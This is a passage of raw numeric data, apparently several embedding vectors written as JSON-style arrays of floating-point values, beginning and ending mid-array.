6,-0.003838483,-0.04760628,-0.021691777,-0.02892752,0.018001687,0.006355244,0.027480043,0.023910113,0.033093985,0.028588302,0.011644025,0.025074864,-0.0012165447,-0.012448657,-0.017042242,0.011655617,0.0012191586,-0.034570202,-0.020976404,0.0111632245,-0.0018004167,0.0060380227,-0.02945372,0.045091834,-0.0068918513,0.0071569066,-0.017933471,-0.01967842,-0.025089437,0.0052876007,-0.008945393,0.029742585,0.04024028,0.0136577515,0.022069834,-0.09495527,0.010251147,0.037193257,0.05364263,0.07885045,-0.001801184,-0.028702946,-0.0036437593,0.018033752,0.031779625,-0.0355375,-0.030000746,-0.0013882603,-0.006843116,0.003520946,-0.0075812885,0.02315266,0.051373556,0.03242296,0.040002182,0.014204871,0.0109007275,-0.057899978,-0.007736667,-0.030497596,-0.03752866,0.051632866,-0.03843022,0.010071431,-0.032118358,0.0024527898,0.047345426,0.027631888,0.0574601,-0.031253006,-0.012565511,0.027367882,0.027640818,-0.035850897,0.004834268,0.057368893,0.017833045,0.029745547,0.022080962,-0.033275433,0.00053686317,-0.0021773595,-0.020388767,-0.0012557784,0.061690714,0.025866484,-0.025520403,0.0021748734,-0.035125945,-0.02913037,-0.004604928,0.020426119,-0.01250466,0.059967216,0.020096624,-0.015466493,0.049659383,0.0245395,-0.0066407877,-0.019292649,-0.0031943705,0.033426616,0.033530243,0.0095467325,0.032805413,0.007287465,0.03198278,0.0016801094,-0.029351553,0.007691104,0.0051535964,-0.03199959,-0.05143325,0.0010443205,-0.017148409,0.051528163,0.06367932,0.016841896,-0.019305745,0.030152012,0.01932385,-0.018580092,-0.027188685,-0.02757687,0.03898529,0.0015219455,-0.05313967,0.016811654,-0.07392241,-0.0323671,0.03801557,-0.066037744,0.029665502,0.0595165,0.0030592817,0.026325006,-0.025870327,-0.08394687,-0.009046793,0.019230135,-0.008932532,0.005711575,-0.024083106,-0.047393266,0.035704907,-0.002567766,0.049245227,0.056194037,-0.019950783,-0.05140798,0.0013104395,-0.010234503,0.066828646,0.006710706,-0.010421449,-0.018073773,0.032118954,0.02784959,0.019751368,0.021152826,0.050813477,0.028327612,0.0120411115,0.01356368,-0.022214644,0.01597721,0.039129913,0.0036643872,0.05329453,-0.0029623543,-0.01910582,-0.019652396,0.023418995,0.025681613,-0.0045260163,0.050625924,0.020041049,-0.089491524,-0.014195416,-0.06925056,0.017833844,0.0768797,0.007870376,-0.021139342,-0.087407395,0.07113008,-0.012435201,0.032288913,-0.01497601,0.014452013,0.10221805,-0.01045648,-0.0040716464,-0.01811503,0.0096900305,0.0029860907,-0.006172103,0.006669596,-0.069830686,0.0038707776,0.0017804289,-0.050689682,-0.0023784114,-0.046863995,0.04115919,0.06793319,-0.041531365,0.029874844,0.0091813225,-0.029833121,-0.048338655,0.010865965,-0.02027996,0.012785406,-0.00053503,0.07793678,0.02074718,-0.04321402,-0.053023603,-0.023215525,0.03237311,0.04550271,0.042872183,-0.0372245,-0.00028957461,-0.0059700385,0.00031732666,-0.029250879,0.020795928,0.016713746,-0.044194,-0.053954482,0.002560538,0.009020831,0.0064470433,0.026630718,0.052310288,0.06407345,0.029552175,0.0156612,0.0009422601,-0.0069502327,0.06041377,-0.0468443,-0.063758105,0.045794796,0.0011018236,0.0102551775,-0.00808816,0.022190446,0.043784097,-0.042899188,0.02545705,0.025995553,-0.057627797,0.050171915,-0.0146052865,-0.040926017,-0.011530427,-0.03138293,-0.042125873,0.027543807,0.029815616,-0.07009406,0.039876033,0.028496094,-0.00033246804,0.027604397,-0.037924938,-0.007765308,0.010259826,-0.0007813429,-0.04734273,-0.0044745044,0.049687557,0.019276772,0.0019883409,0.05335762,-0.021875022,-0.006276302,0.011802456,-0.025143255,-0.034014523,0.058980923,0.031676482,-0.061362095,0.017231978,-0.013248001,0.010633059,-0.025492376,0.0029228972,-0.046752248,0.0007753788,-0.039077744,0.0015567772,-0.017785154,-0.03488071,0.04458672,0.0645629,0.027023342,-0.024867665,-0.019803543,-0.005063423,-0.009566675,0.014873965,0.026337514,0.09863992,-0.0761044,-0.023212144,0.016166119,-0.017632736,-0.014423421,0.057674684,0.019213084,-0.03858865,-0.052012865,0.007986532,-0.021785881,0.066090174,0.04556872,-0.034500424,-0.0037719426,-0.06511921,0.0047695297,-0.022482516,-0.024672637,-0.039311305,-0.008000703,0.06906746,-0.0056190277,-0.008006557,0.013186393,0.028818952,-0.0065474845,-0.0095812995,-0.13092107,-0.008210573,0.06503281,0.06696012,-0.061951753,0.056671076,0.022795746,-0.010781562,0.0066256537,0.021418365,-0.022633243,0.06461651,0.018201277,-0.019013632,-0.00006116464,0.006641517,0.0026002764,0.09653862,0.018679066,-0.027145984,-0.010854398,-0.008783973,-0.07700389,0.053508107,-0.0559689,0.017437166,-0.025699906,-0.01881181,-0.030593764,-0.0060688434,0.047602467,-0.07212061,-0.00708054,-0.053803876,0.027962523,-0.06894332,0.009324431,-0.05222974,0.04090734,-0.0013663346,0.02383117,0.030281061,-0.026650295,-0.009737752,0.048579615,0.0451407,-0.043125205,0.01153817,0.024570618,0.061130323,-0.06639158,0.065561034,0.09952788,0.010097992,0.021706337,-0.033378463,-0.011384255,-0.006495259,-0.029289229,-0.06303907,-0.020681713,-0.010627526,0.017496785,0.013995145,-0.010556282,-0.003925124,0.028769653,0.018664649,0.005616542,-0.011475373,-0.025955766,0.052984,0.041995157,0.018150056,-0.02407033,0.0079901405,0.0022723,0.019105218,0.033308648,0.019361002,-0.019726342,0.015104611,-0.014368179,0.054029092,-0.06682362,-0.0020475597,-0.04425803,-0.0023400132,-0.029105501,-0.060179394,-0.049370546,-0.033923108,-0.06573052,0.0025730217,-0.015154957,0.03504985,0.0471729,-0.019588567,-0.0051078564,-0.02051113,0.06033714,-0.014829365,0.005557163,-0.01904056,0.015477198,-0.012532893,-0.023813399,0.02445376,0.01947884,0.01571365,-0.020520369,-0.068735175,0.03448961,-0.03390004,0.032942448,0.020662159,0.030352097,-0.042379905,-0.028853927,0.0062508592,0.029241407,-0.0038244226,-0.008886897,-0.037358172,-0.0034826146,0.01944036,0.013176171,0.029792488,-0.059452433,-0.027202638,0.044981737,-0.0017320375,-0.0019947144,-0.047957882,0.07032475,0.011675687,0.01998681,-0.006997942,-0.013898716,-0.035844296,-0.025418302,0.0016516082,0.026201073,-0.016841618,-0.006297944,-0.033779353,-0.035726417,-0.01593904,0.044531673,0.01321661,-0.024952533,0.026715668,0.0043693567,-0.016060082,-0.01133084,0.008523974,-0.015939511,0.025882112,0.05092903,0.117781,0.010805126,0.029672671,-0.033473942,0.045231514,-0.047293615,-0.015901398,-0.0015582596,-0.013579927,0.0040438017],[0.028156979,0.021579036,-0.18477453,-0.08002079,0.103649214,0.019395001,0.008645727,0.018705288,-0.03463498,0.0077431616,0.047194295,0.036844995,0.092671186,0.019760963,0.026588818,-0.047753766,0.012635432,-0.050230775,-0.034455176,0.036098,-0.03137294,-0.015204844,-0.00025672972,-0.030687224,0.07325169,0.047010493,-0.035537735,-0.056376763,-0.007850309,0.007821342,-0.008330872,-0.018189438,-0.044188023,0.040700763,-0.099384986,-0.0281049,-0.018971344,0.058799658,-0.016373968,-0.0023200177,0.057632826,0.0064926883,0.009951471,-0.04456217,0.012058163,-0.009573627,0.026271712,-0.0070326896,0.021070631,-0.06056219,-0.006412636,-0.037736867,0.037465896,0.006089736,0.10376558,0.028133892,-0.02854487,0.016901694,-0.00016885885,-0.02372655,0.052636426,0.06861757,-0.08792491,0.039286293,0.03996633,-0.03665924,-0.044961978,0.04608221,0.007737949,-0.037212756,0.03919237,0.008392971,-0.019689115,0.020441195,-0.061025612,-0.017509038,-0.0137206465,-0.0387938,0.022993768,0.043298077,0.024794081,-0.008797074,0.09489305,0.036628556,0.06574523,-0.041799147,-0.0030566403,-0.0227922,-0.05299858,0.03608847,0.0047808737,-0.00973387,0.03145151,-0.0084339315,-0.07620353,-0.0040523806,-0.007960681,0.0073134913,-0.03545797,0.015504193,-0.06349106,-0.031717632,0.029700113,-0.012799521,0.02541659,0.031929348,0.022505436,0.051037185,-0.008051421,-0.03323548,0.010412529,0.07762489,-0.052704226,-0.018134575,-0.0015830701,-0.032468293,0.012652902,-0.0582622,-0.017032223,0.052876513,0.003164846,-0.014880381,-0.03836503,0.07483402,-0.012611253,0.016781425,-0.06654669,0.032382008,-0.022123145,-0.026150808,0.0113490885,-0.029868199,-0.028713055,-0.016269866,0.0087595,0.061683066,-0.034166098,-0.033467107,0.017784284,0.047233995,0.04114899,0.010075296,-0.0347198,-0.028513227,-0.011729284,-0.023745675,-0.0068863826,-0.021573668,-0.024182212,-0.013107505,0.04464032,0.016526822,0.00083165965,0.013306531,-0.005417354,-0.019710444,0.026190141,0.00205069,0.0068664514,0.016833752,0.063360155,0.051965576,-0.08010485,0.04962067,-0.010729424,-0.022247246,-0.039355587,0.040724926,0.0179928,0.037425663,-0.07748439,-0.02124374,0.028452734,0.006210612,0.03902682,-0.01924487,0.03305463,-0.022214599,0.013547838,-0.019790132,0.016141826,-0.071751796,0.06944131,0.006255739,-0.037611935,-0.04599862,0.029428324,-0.01999368,0.023385752,-0.017970601,0.013693129,-0.02455402,-0.040476393,-0.0016458334,-0.06624512,-0.06680634,0.019233089,0.004545772,0.039230287,-0.032542292,-0.026319379,-0.0017175656,-0.040011987,-0.019271042,-0.0695033,0.05504509,0.021313325,0.029402891,-0.06526309,0.043734796,0.05181224,0.006057585,0.042107053,-0.004517542,0.0040358244,0.003032993,0.00006249023,-0.01579946,-0.058853913,-0.024408154,0.010875413,-0.0013876798,-0.0035777502,0.014166095,0.0033537098,-0.006223873,-0.031115172,-0.012563025,-0.026607977,-0.013884034,-0.02529455,-0.067259304,0.06585398,-0.011383827,0.018548058,0.027238065,0.033960957,0.038534213,0.015318809,0.00068835693,-0.015368031,0.04384621,-0.026867935,0.002026054,-0.031834044,-0.033383586,0.020349674,-0.016194588,0.02925912,0.037169077,0.007924571,0.005008576,0.021260804,-0.00088992127,0.049551297,-0.015664527,-0.06334673,0.0052306047,0.026132312,0.04072418,0.050765634,-0.03127105,0.019436566,-0.04090609,-0.040787637,-0.020021725,-0.051858272,-0.013501945,0.02611559,0.024528304,0.051218007,0.06722642,0.024872523,0.02617943,0.017137691,-0.013128508,-0.043702327,-0.029795025,-0.007158101,-0.005469099,-0.021955077,0.027573131,-0.01020803,0.022660336,-0.023021631,-0.026021233,-0.004681559,0.02161537,-0.011512014,-0.014579607,-0.0069571007,-0.028221456,-0.007681133,0.012108469,-0.004403753,0.02738389,0.04748333,-0.0015162649,0.015531475,-0.0713733,0.01650678,0.03157275,0.025759274,0.047179163,-0.0027164256,0.00128869,0.009056229,0.0041727168,0.030304248,-0.045326605,-0.08999702,-0.018463792,0.0043300968,-0.00021481645,-0.033760384,0.033887334,0.032677557,0.030401759,0.0217162,0.032150403,0.024721287,-0.015960207,0.029636856,-0.0053451704,-0.051797032,0.06762093,-0.010135079,-0.007133823,-0.012196406,-0.021936217,0.05909366,0.03798254,0.023698587,-0.05689426,-0.019205118,0.03195752,0.018490411,-0.0025583836,-0.018736986,0.044590894,0.039479483,0.009329582,0.025842309,-0.033429954,0.008052928,0.025165804,-0.07204568,-0.038962733,0.05869187,0.02671052,0.00409713,0.01651568,-0.024777938,-0.031423215,0.027264494,0.003323525,0.031180577,0.041306946,0.011194607,-0.019771693,0.01327824,-0.020679418,-0.01743982,-0.02847037,-0.020366943,0.0036333038,0.030413004,0.008108828,-0.014970538,0.047752183,-0.012518041,-0.012291628,-0.015014804,0.02564967,-0.016798683,-0.013449855,-0.09892475,0.028361047,-0.042308073,0.017723897,0.017694674,-0.007791761,-0.007395196,0.031351812,0.03291037,0.000549696,-0.011034175,-0.035484396,0.027560117,-0.007963537,-0.05122742,-0.0029261592,-0.05900795,-0.0031085683,0.012272252,-0.045916352,0.013916884,0.03911751,0.015850475,0.02925461,-0.04300932,-0.016350219,0.019949483,0.012674309,-0.035024304,0.016661637,-0.022102201,-0.043609798,0.005411397,0.030540599,0.03141795,0.021598378,-0.020023674,-0.057843123,0.012978835,0.035047617,0.039011277,0.017438991,0.013119379,-0.011035516,0.06189823,0.035745304,0.010050017,-0.019596348,0.03443593,0.041575637,0.04700455,0.054562632,-0.006714392,-0.003713773,0.034603845,0.017495187,0.021172628,0.014651362,0.013597339,0.02284451,0.009028152,0.043247953,0.011951158,0.06423331,0.002403491,-0.081614956,-0.07183987,-0.06542765,0.017544787,0.027414296,0.053069696,-0.045430757,-0.10412894,0.0423633,-0.017374104,0.036037937,-0.005791449,0.01037449,0.10889489,0.020480469,-0.02119146,0.010227217,-0.020699015,0.028067563,-0.00616378,0.0150897475,-0.03815459,0.014597763,0.01629745,-0.015097634,-0.008242239,-0.046239052,0.034351744,0.016707564,-0.066124946,0.03462568,0.018919362,-0.03813132,0.0033053434,0.022444965,-0.041357026,-0.005525336,-0.01568043,0.0791065,0.033789724,-0.04643564,-0.016827941,-0.051197592,-0.016947135,0.04496681,0.04543393,0.013679066,-0.017365381,-0.029617948,0.03514892,0.006713173,-0.009969798,-0.028926793,-0.04038901,-0.02324437,-0.022930063,0.049196705,0.04423382,0.02233156,0.018223688,0.047143985,-0.03567538,0.056062695,0.007051858,-0.024966417,0.097563766,-0.067715235,-0.05190272,0.03156077,0.010637214,0.013710552,0.04035092,0.01577943,0.050124053,-0.05224248,-0.010931734,0.007982972,-0.03496401,0.032975823,0.021919288,-0.053759765,-0.03870749,-0.0064374562,-0.060098253,0.016699847,0.008406613,-0.08549673,0.060063377,-0.01893485,-0.008755448,0.018448431,-0.052945994,-0.0076878597,0.025808627,-0.03256579,-0.03452638,0.01894392,0.018179404,0.03563579,-0.012890711,0.053438526,0.015355753,-0.005412028,0.040118493,0.028058756,-0.035976835,0.025420295,-0.0021017762,-0.073686,0.0011900116,-0.039458066,0.015063605,-0.058686294,0.01638348,-0.044254147,-0.016784286,-0.04940503,-0.030522726,-0.08516823,-0.044186443,0.011007358,0.052087706,0.04088476,0.0047449456,-0.052691236,-0.014673989,-0.012586051,-0.00722865,0.017182618,0.033928853,-0.050433274,0.021310385,-0.04040984,0.015643014,-0.0057044025,0.032100923,-0.004191885,-0.046393383,-0.042518225,0.056738593,-0.04431196,0.028288528,0.0063177655,-0.010935148,-0.03630101,-0.049811613,-0.028082766,-0.036328085,-0.011885474,-0.027905244,-0.017991798,0.024219638,-0.020786071,-0.030754242,0.02475277,-0.023140494,-0.028044738,-0.03377317,-0.059124712,-0.001564797,0.034898475,0.03261876,-0.015468314,0.055081036,0.05496325,0.028914055,0.0040834076,0.00436521,-0.06063087,0.013342802,0.06051042,-0.022087755,-0.015513823,0.012485132,-0.004218265,0.08557118,-0.014142238,-0.021781463,-0.032761116,-0.023350788,-0.060454685,0.09392143,-0.02960612,0.039836086,-0.0040526194,-0.014677564,-0.050146636,-0.02080898,0.042319164,-0.054504596,0.009677341,-0.042044286,-0.007379517,-0.07105215,0.028652243,-0.0116722025,0.03389689,0.009673773,0.049993042,0.016339542,0.01552476,0.00057657546,0.03598254,0.024821114,-0.013845955,-0.020291219,0.051819623,0.04118163,-0.047543455,0.0646193,0.034173723,0.05159336,-0.011877778,-0.0021509377,0.017024657,0.045315538,-0.018212225,-0.008861796,-0.03828366,0.0029665022,-0.011260507,0.0013673281,0.0019726453,0.025467165,0.010572977,0.0028453886,-0.019406667,-0.019635545,-0.027951764,0.07324392,0.0064830687,0.023762204,-0.049606293,0.022007836,-0.034695532,0.031655774,0.041019782,0.03656297,-0.032658495,-0.0073509268,0.010498307,0.04007002,-0.051032685,0.02224937,-0.07631624,0.041966066,-0.015646081,-0.022805609,-0.031435523,-0.0022275595,-0.05964978,-0.0038790405,-0.014096435,0.044729892,0.028044637,-0.019629473,0.014160435,-0.02798802,0.04901315,0.029551012,0.021085769,-0.0017883567,0.031604342,-0.0007866811,-0.012711671,0.048951093,-0.010543394,0.005854667,-0.02808779,-0.015647272,0.018832034,-0.00967069,0.02052062,0.033140015,0.0073175156,-0.045369364,-0.050673332,-0.01588426,0.027571103,0.0615831,-0.00618285,-0.047668822,-0.013585768,0.020634344,0.0061377506,0.0038548694,-0.02702774,0.014906879,0.0066765863,-0.018918317,0.020036161,0.00018229093,0.07481459,-0.012487646,0.044728346,-0.0017724045,0.0013872928,-0.05687741,0.008622685,0.0033263417,0.020557124,-0.00006617582,0.024194824,-0.008411979,-0.041283168,-0.038638,0.06295209,0.012384154,-0.048532676,0.037494607,0.027448373,-0.045299046,0.028981475,-0.03648897,-0.021020386,0.011254382,0.059176095,0.09422256,0.01271996,0.017704401,-0.045157388,0.057353765,-0.04821017,-0.03576237,-0.020706708,-0.022263397,-0.050123367],[0.03346106,0.03287139,-0.18238117,-0.05113651,0.072279386,0.03305667,0.010072233,-0.017228987,-0.033489402,0.014733615,0.0032066093,0.0051114457,0.029161073,0.034615505,0.050557543,-0.04589134,0.010757169,-0.042851117,0.0016669233,0.062987246,-0.02703722,-0.032373782,-0.031130359,-0.05862161,0.070588455,0.03149183,-0.019462958,-0.007049352,-0.031452656,0.017579209,-0.040551335,-0.016156968,-0.036832403,0.029834466,-0.12543201,-0.046646666,0.035867754,0.028712753,0.03305343,0.0068494114,0.0376185,0.015862124,-0.012015892,-0.016543029,0.0065953657,-0.013671437,-0.0029316887,0.050070997,0.038337443,-0.11322035,-0.016299339,-0.049726654,0.024982747,0.005705665,0.08219135,0.026298953,0.018604724,-0.011423218,-0.0045238193,-0.02977066,0.009604746,0.058399457,-0.067731015,0.0376295,0.018637167,-0.003850045,-0.046109848,-0.0097161485,0.037297916,-0.041529633,0.08809762,0.005380479,-0.029687585,0.026868695,-0.031250633,0.0074180425,-0.030058369,-0.032230757,-0.0073983865,0.013112158,0.056573696,-0.026794972,0.0870875,-0.015437054,0.064568006,-0.020589788,-0.00862948,-0.025971172,-0.050184797,0.028402798,-0.010887451,-0.011109214,0.060025133,0.012800407,-0.120243296,0.0062382324,-0.014478016,0.03650088,-0.026222615,0.0063633327,-0.036910232,-0.03152524,-0.014698298,-0.0138098225,0.0055234204,0.06773652,-0.008140019,0.015313422,-0.018510353,-0.037151814,-0.011032124,0.037244983,-0.051802546,-0.037374195,0.029406514,-0.021368235,-0.0040986724,-0.052405085,-0.02569139,0.043526612,0.00082175946,0.001206513,-0.032716833,0.07407407,0.020574216,0.0054479223,-0.045114994,0.025242573,-0.00094919285,-0.0369724,0.014805641,-0.006129551,-0.037858464,-0.010047539,0.000996505,0.050594624,-0.024005765,-0.05533044,0.024620574,0.019888576,0.100360915,0.0053352066,-0.026037479,-0.038554262,0.011851254,-0.04549149,-0.010236784,0.0019565031,-0.05762254,0.012388722,-0.017663497,0.010882621,-0.0043414286,-0.00616544,0.025300413,0.017588718,-0.0009532344,0.022632306,0.00050097395,0.026759572,0.019416586,0.015556355,-0.065931834,0.03805077,-0.0029672256,-0.028512176,-0.026798002,0.047963545,-0.008167077,0.013830928,-0.079110846,0.0011891666,0.01158727,-0.038268365,0.040582594,0.016971335,0.046738353,-0.0064257025,-0.0149092795,-0.017565373,0.012910462,-0.043468613,0.03600141,0.0073008887,-0.026236186,-0.026938133,0.013688361,-0.024403377,-0.033722643,-0.029698443,0.048836634,-0.022073314,-0.043192785,0.016472755,-0.06622211,-0.04297885,0.012389714,-0.0032973203,0.049522392,-0.022307923,-0.016284183,-0.023591157,-0.031232733,0.016932234,-0.05035845,0.06130411,0.013291864,0.02061689,-0.021589011,0.015866917,0.053389017,-0.019918658,0.0448703,-0.03342763,-0.0014033881,0.0017838096,0.03067015,0.014080657,-0.05151031,-0.02316506,0.007935598,-0.007954077,-0.022607848,0.0093614,0.022070676,0.019212937,-0.0048925225,0.03074934,-0.017464554,-0.013209247,-0.037106816,-0.074410655,0.056219094,-0.0011887538,0.017270986,0.040603764,0.038907774,0.04001242,0.018005328,0.0551353,-0.013129105,0.06082166,-0.04875671,0.07177473,-0.057518218,0.0058128713,0.03818931,-0.028400978,0.0056650653,0.040275298,-0.02709788,-0.022838693,-0.003553072,-0.011561536,0.055662654,-0.043689806,-0.081418134,0.009363129,-0.010593124,0.029656727,0.015903514,-0.029600395,0.019751938,-0.029486543,-0.036668114,-0.045784447,0.0027923298,0.018709196,0.028717628,-0.005725535,0.0202622,0.050873697,0.027881421,0.022339331,-0.01610352,-0.019766858,-0.030061314,-0.015536168,0.013380731,-0.015860634,0.011619526,0.0040497575,-0.04129305,0.022366276,0.006012961,-0.020771371,0.0058013443,0.02220387,-0.02833531,-0.023344908,-0.02782478,-0.032991014,-0.044751346,0.002096282,-0.02147665,-0.0005263323,0.012693002,-0.020561818,0.03365502,-0.07576339,0.032233324,0.008005976,0.016993608,0.026499346,0.025201516,-0.027759103,0.016572746,-0.04562327,0.053773142,-0.048013747,-0.07769581,0.011697145,-0.016482843,0.01861362,-0.045167323,0.02098141,0.01841506,0.052826922,0.02799059,0.014122744,-0.0076210494,-0.04872453,-0.006974627,0.008347369,-0.046108965,0.07181218,-0.04761133,0.005328316,0.0061922604,-0.015669543,0.024332643,0.03518941,0.016548041,-0.043536823,-0.025176138,0.008446108,0.04654457,0.031626027,-0.023895158,0.03702527,0.103457056,0.022129988,0.02742189,-0.037262876,0.014352086,0.011197741,-0.05328487,0.026023312,0.06737833,0.0063352855,0.018118452,-0.004225524,0.0006945993,-0.008701667,0.011901923,0.0038120882,0.044483803,0.03783897,0.029738992,-0.016404873,0.048149124,-0.0010132524,-0.002942759,-0.00018105048,0.01486253,0.04252286,0.03942013,0.0011009846,-0.034973815,0.024704942,0.0015387713,0.013172674,-0.051926862,0.03753271,-0.015047027,-0.033937126,-0.09153366,-0.015729109,-0.013853763,0.03980877,-0.011175383,-0.023031322,0.040650215,0.027697392,0.048891623,0.0059638075,0.010648827,-0.017877327,0.015354659,-0.003419986,-0.055063162,-0.0053048558,-0.06967682,0.01799639,0.050343487,-0.020625915,0.024320018,0.025690805,-0.015648492,0.047049344,-0.024421953,-0.048929602,0.026640803,0.025475359,-0.017564462,0.0046136305,0.018703628,-0.0593899,0.042095236,-0.030360479,0.042923644,0.050651602,-0.02437454,-0.07252974,0.024601404,0.015631672,0.052613318,0.01756617,-0.000031144482,0.00020162524,0.029354917,0.061414175,0.019224111,-0.0017889502,0.00709765,0.06319044,0.01442795,0.04657697,-0.0039246795,-0.026740925,0.029424986,0.016389623,0.05462976,-0.0037104432,0.017032782,-0.008555325,0.0065363967,0.04425767,-0.00023021415,0.041032832,0.06480011,-0.062234234,-0.06397147,-0.040515337,0.01268202,0.03377458,0.029559357,-0.07591574,-0.0876069,0.0373761,-0.056254633,0.037190262,0.0095089525,0.027893713,0.085674755,-0.0056101955,0.019865174,-0.016456125,-0.03269898,0.010116208,0.018988786,-0.0077258614,-0.021741612,0.025207642,0.038530637,-0.019510273,-0.0071637067,-0.05078099,0.026426747,0.003914283,-0.06747444,0.03668712,0.0036522031,-0.031397384,0.027093701,-0.034295898,-0.03563117,-0.017082894,0.014355247,0.06994977,0.036015272,-0.04276445,-0.017907403,-0.014546416,-0.014010918,0.057928346,0.031260315,0.0026045425,0.023713583,-0.013936738,0.0560005,-0.009357859,-0.0054761562,-0.03286183,-0.06222945,-0.029268997,-0.02794228,0.033930466,0.0016892924,0.034690935,0.035110455,0.04771256,-0.04588484,0.051257834,0.047423504,-0.007215131,0.063008,-0.05346671,-0.03578218,0.04109012,-0.002860255,-0.000284398,0.014182975,0.0025820197,0.06358577,-0.044610377,0.028114645,-0.020712331,-0.048400644,-0.0007624892,0.026610529,-0.018400285,-0.034520302,-0.031594742,-0.05009705,0.003460602,0.0027327104,-0.08348219,0.045197327,0.017898163,0.0043786024,0.03974396,-0.02863569,-0.011325705,0.0012516497,-0.040862206,-0.02246198,0.042493325,0.037433878,0.041513547,0.029651202,0.030185169,-0.0067434264,0.014332938,0.037132636,0.057442818,-0.033694386,0.060135197,0.01907999,-0.06571924,-0.01277203,-0.043072138,-0.022611711,-0.036404353,0.043271136,-0.027857969,-0.04030811,-0.04530225,-0.07954379,-0.05025248,-0.028923247,0.032625377,0.0481347,0.023086136,0.017020453,-0.05278467,-0.021865267,0.011689507,-0.013455104,0.033350997,0.020739496,-0.027017213,-0.0038062716,-0.0380686,-0.037843496,-0.01920402,0.024361607,0.019663699,-0.079547636,-0.04096115,0.04840476,-0.014928977,0.01395974,0.036303587,-0.041805983,0.014110971,-0.045868453,0.020221956,0.013136137,-0.02466566,-0.022951996,0.013471241,0.004582729,0.0021004535,-0.04673066,0.02851772,-0.029079352,-0.03621342,-0.016288549,-0.071306646,0.019433187,0.037340444,0.05368902,-0.04563062,0.046148255,0.0683817,0.036788683,0.056106523,-0.008094056,-0.035654258,0.042527612,0.059809063,0.014068086,-0.01664378,0.010313845,0.019276492,0.052894615,-0.00846288,-0.051804557,-0.05426374,-0.02693973,-0.047705796,0.07674602,-0.04674616,0.040938172,-0.00803954,-0.008229302,-0.021802668,-0.029407432,0.008645139,-0.04875915,0.008743234,-0.017901292,0.005548439,-0.059105672,0.029250795,0.008011809,0.069278255,-0.009811097,0.057582352,0.047334757,-0.014948342,0.01784122,0.04164328,0.04123013,-0.017563231,0.009027247,0.04864464,0.006875338,-0.015656875,0.048218556,0.036492456,0.050480712,0.017206416,-0.011625837,0.045187954,0.02358286,-0.007074897,-0.038952272,-0.028797017,-0.0018335575,0.007338913,-0.051736,0.030807804,-0.0014258145,-0.0104223825,0.008611313,-0.020492822,-0.053015675,-0.028059771,0.03769323,-0.0045781024,0.028155964,-0.059511237,0.014417284,-0.020370204,0.0365528,0.025439896,-0.023772467,-0.033800233,0.009926195,-0.000265776,0.02692122,-0.055625595,-0.029167086,-0.03703221,0.03494465,-0.016305158,-0.04148161,-0.03012528,0.0063624713,-0.035220657,0.0047962237,-0.0047102086,0.020348761,0.019805254,-0.028164255,0.018746557,-0.040665008,0.07396837,-0.01012453,0.029876968,0.0023132195,0.030051028,-0.024727087,-0.03349232,0.041364037,0.025517615,-0.010124819,-0.035320964,0.008574502,0.028102351,-0.056190804,0.04610192,-0.01812093,0.027333118,-0.010920456,-0.048422728,0.02443454,0.037588913,0.03684476,0.013996522,-0.03991733,-0.050675794,-0.044692986,0.009190794,0.037715893,-0.035174415,0.026612684,-0.006151074,-0.0013369395,-0.0003674325,-0.01167751,0.09947223,0.0020076814,0.02989807,-0.021884277,0.004235251,-0.025807282,0.003280591,-0.014002656,-0.004956461,-0.010291392,-0.00966093,0.015913075,-0.05414876,-0.012433,0.04734276,0.009792461,-0.043669634,0.018908717,-0.00481937,-0.050567415,0.036017552,-0.022224324,0.0031819057,0.01404363,0.034051917,0.11920899,-0.012574499,0.010933836,-0.022657549,0.005926839,-0.03609083,-0.0580538,-0.0075798607,-0.023945618,-0.04873207],[-0.013977123,0.042292047,-0.17237087,-0.075517826,0.066855334,0.0010653163,0.01832264,0.024124991,-0.03045887,-0.0058563626,-0.032221247,0.02401305,0.0669556,0.018703854,-0.0022311273,-0.103094354,-0.05291471,-0.07262263,-0.036692414,0.06450142,0.0007382876,0.0039514876,0.059482183,-0.08177445,0.056048017,-0.023178592,-0.021825125,0.0011241141,-0.0005195449,-0.033433363,0.011382696,-0.008267292,-0.03306101,0.028710518,-0.070517816,-0.043722622,0.044054456,0.011570624,-0.0017992784,0.024405494,0.05091866,0.04168409,0.01138118,-0.009791573,0.027835062,-0.01679257,0.005983996,-0.0018218277,0.06230836,-0.061659236,-0.02115129,-0.022445524,-0.0068343696,0.013253343,0.07595244,-0.0061540217,0.0083497735,0.0005309612,-0.058384955,-0.063193165,0.06980061,0.055092484,-0.08302873,0.056523506,0.016748546,-0.01389305,-0.0843702,0.06660113,0.011253066,-0.02177112,0.043801494,0.0042286715,-0.010333837,0.073209964,-0.041230924,-0.019030381,-0.018224893,-0.037860632,-0.0076344633,0.016223336,0.029675592,0.000433814,0.053730708,-0.020585356,0.036372606,-0.013388108,-0.03742294,0.00036221356,-0.011429391,0.05498378,0.007408144,-0.0155957565,0.054944582,0.0008759803,-0.054848205,0.012072441,-0.025930963,0.0068849027,-0.014968573,-0.032293368,-0.037284218,-0.03320382,0.04537474,-0.01992126,0.0056489557,0.070032425,0.00022291865,0.021924073,-0.04921841,-0.007240616,-0.018393183,0.07997884,-0.013704414,-0.0072915703,-0.027310362,-0.011020379,-0.003972398,-0.0129087325,0.00043159924,0.02853001,-0.018344551,-0.0124409525,-0.03242182,0.022392692,0.0023967426,0.0265906,-0.047284674,0.019640973,-0.024307702,-0.02526488,0.020712085,0.014466084,-0.04879272,-0.042100593,0.013105627,0.06738366,-0.02306445,-0.022396345,0.02875912,-0.0002782369,0.095697954,-0.0052928426,0.021591552,-0.045526832,-0.03547052,-0.038074765,-0.01627587,-0.036883514,-0.022309415,0.02809064,0.007392338,0.004946231,-0.0010494137,-0.0010027038,0.034911536,-0.0018402316,-0.015191116,0.0018805412,0.016553113,0.025631044,0.023229918,-0.006276636,-0.039042376,0.07238842,-0.012398642,-0.062609695,-0.02177329,0.01522225,-0.006344344,0.039827492,-0.07705881,0.008204485,-0.017275997,-0.013898425,0.027763784,0.026974466,0.08442706,-0.05348781,-0.042548154,-0.0154537335,0.00039835318,-0.064250804,0.0247493,0.02417944,-0.023650235,-0.005667165,-0.014880567,-0.046689462,-0.007515202,-0.023760498,-0.010831176,0.00016963662,-0.028901191,-0.027235724,-0.048642088,-0.050660107,0.012487191,0.0052943127,0.045496017,-0.05042066,-0.058020867,-0.025551254,-0.032618348,0.019269941,-0.055585068,0.044425867,0.013263347,-0.0022031697,-0.008493105,0.057802804,0.05871925,-0.038741753,0.006962024,-0.017996224,-0.0039416687,0.024939671,0.025770467,-0.006364819,-0.05309227,-0.017345645,0.010888881,0.014161472,-0.026412025,0.02097984,0.060041383,-0.037706792,-0.028574543,0.0386984,-0.0051